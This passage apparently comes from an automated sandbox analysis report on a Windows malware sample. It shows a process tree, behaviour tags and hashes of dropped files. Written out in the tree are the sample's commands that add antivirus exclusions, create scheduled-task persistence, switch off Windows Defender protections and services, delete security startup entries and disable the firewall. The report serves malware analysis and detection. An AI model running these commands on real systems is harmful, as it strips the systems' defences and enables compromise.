                                                                                                                                    • Modifies security service
                                                                                                                                    PID:3596
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
                                                                                                                                3⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4172
                                                                                                                              • C:\Windows\System32\schtasks.exe
                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
                                                                                                                                3⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:4840
                                                                                                                              • C:\Users\Admin\AppData\Roaming\x69install.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\x69install.exe"
                                                                                                                                3⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1864
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
                                                                                                                                  4⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  PID:2864
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                              2⤵
                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                              PID:2976
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                3⤵
                                                                                                                                  PID:2092
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Drops startup file
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:980
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:3176
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2840
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
                                                                                                                                    4⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1432
                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:1888
                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                2⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:1520
                                                                                                                                • C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
                                                                                                                                  3⤵
                                                                                                                                  • Checks computer location settings
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:3432
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    PID:2456
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9933.tmp\9934.tmp\9935.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:3408
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3708
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2580
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4692
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1444
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3192
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3572
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3596
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:2412
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:844
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:216
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -MAPSReporting 0"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3400
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4148
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4088
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:4828
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:1700
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                      5⤵
                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3984
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                        6⤵
                                                                                                                                          PID:1896
                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                         powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
                                                                                                                                        5⤵
                                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:3756
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                           "C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                                                                                          6⤵
                                                                                                                                            PID:1840
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell.exe -command "netsh advfirewall set allprofiles state off"
                                                                                                                                          5⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:1560
                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                            "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                                                                                            6⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                            PID:3752
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                          PID:3908
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                          • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                          PID:216
                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                          reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                                                                                                          5⤵
                                                                                                                                            PID:2804
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                                                                                                            5⤵
                                                                                                                                              PID:3672
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:3400
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:3772
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:408
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:788
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                              • Modifies Windows Defender Real-time Protection settings
                                                                                                                                              PID:4056
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                                                                                                              5⤵
                                                                                                                                                PID:824
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                                                                                                5⤵
                                                                                                                                                  PID:2844
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                                                                                                  5⤵
                                                                                                                                                    PID:876
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
                                                                                                                                                    5⤵
                                                                                                                                                      PID:4440
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                      5⤵
                                                                                                                                                        PID:3668
                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                        reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                                                                                                        5⤵
                                                                                                                                                          PID:4348
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                                                                                                          5⤵
                                                                                                                                                            PID:3908
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4612
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                                                                              5⤵
                                                                                                                                                                PID:404
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:3400
                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4904
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:3040
                                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                                      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:3528
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                                                                                        5⤵
                                                                                                                                                                          PID:876
                                                                                                                                                                        • C:\Windows\system32\reg.exe
        reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
        5⤵
          PID:3984
      • C:\Windows\system32\reg.exe
        reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
        5⤵
          PID:2340
      • C:\Windows\system32\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        • Modifies Security services
          PID:3920
      • C:\Windows\system32\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        • Modifies Security services
          PID:4188
      • C:\Windows\system32\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        • Modifies Security services
          PID:3904
      • C:\Windows\system32\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        • Modifies Security services
          PID:4428
      • C:\Windows\system32\reg.exe
        reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
        5⤵
        • Modifies security service
          PID:1676
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
    2⤵
    • Suspicious use of WriteProcessMemory
      PID:4016
    • C:\Users\Admin\AppData\Roaming\x69install.exe
      C:\Users\Admin\AppData\Roaming\x69install.exe
      3⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
        PID:3136
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    2⤵
    • Checks SCSI registry key(s)
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
      PID:2764
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
  1⤵
    PID:3560
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
    PID:3740
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Modifies registry class
    PID:3892
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
    PID:4108
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k netsvcs -p
  1⤵
    PID:4596
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  1⤵
    PID:1040
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
  1⤵
  • Modifies data under HKEY_USERS
    PID:4704
• C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
  1⤵
  • Drops file in System32 directory
  • Modifies data under HKEY_USERS
    PID:1720
• C:\Windows\system32\SppExtComObj.exe
  C:\Windows\system32\SppExtComObj.exe -Embedding
  1⤵
    PID:3960
• C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  1⤵
    PID:628
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  1⤵
    PID:332
• C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  1⤵
    PID:3404
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
  1⤵
    PID:3128
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
  1⤵
    PID:2532
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
  1⤵
    PID:640
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
    PID:2856
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
  • Modifies registry class
    PID:4864
• C:\Windows\system32\wbem\wmiprvse.exe
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
  1⤵
  • Checks BIOS information in registry
  • Checks SCSI registry key(s)
  • Enumerates system info in registry
    PID:3568
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
  1⤵
    PID:1576
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
  1⤵
    PID:2256
• C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
  1⤵
    PID:1356
• C:\Windows\servicing\TrustedInstaller.exe
  C:\Windows\servicing\TrustedInstaller.exe
  1⤵
    PID:2688
• C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
  1⤵
    PID:1948
• C:\Windows\System32\mousocoreworker.exe
  C:\Windows\System32\mousocoreworker.exe -Embedding
  1⤵
  • Checks processor information in registry
  • Enumerates system info in registry
    PID:4800
• C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  1⤵
    PID:4904
• C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  1⤵
    PID:4580
• C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  1⤵
    PID:4472
• C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  1⤵
                                                                                                                                                                                                                  PID:3572

                                                                                                                                                                                                                Network

                                                                                                                                                                                                                      MITRE ATT&CK Enterprise v16

                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                      • C:\Program Files\7-Zip\Uninstall.exe

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        31KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        7e09f62d9e5df18bab9b0f1398b09bcd

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        f056b21813ed260d4e9c489849373c1caf4e590a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        d710adeb5ba5d9416e9c29d5ac2af11c6ce42b3217f566c25c6a13267a7fa6ad

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        07cb9b240211316801649d23200b39a8e607717ba90836226bc5c50af1889d48dcbb5cc22db1e782d341f656cc1649925f368a05de5c205478ce6c329dd5939b

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        2KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\x69.exe.log

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        bb6a89a9355baba2918bb7c32eca1c94

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EL7G5HQ8\k1[2].rar

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        1B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        68b329da9893e34099c7d8ad5cb9c940

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                        01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                        be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                        944B

                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                        cbc4c534fbe66cc13819a167465d406d

                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                        bb5597208c9c5722cbfb6e931e727c3dcffa6fbd

                                                                                                                                                                                                                        SHA256

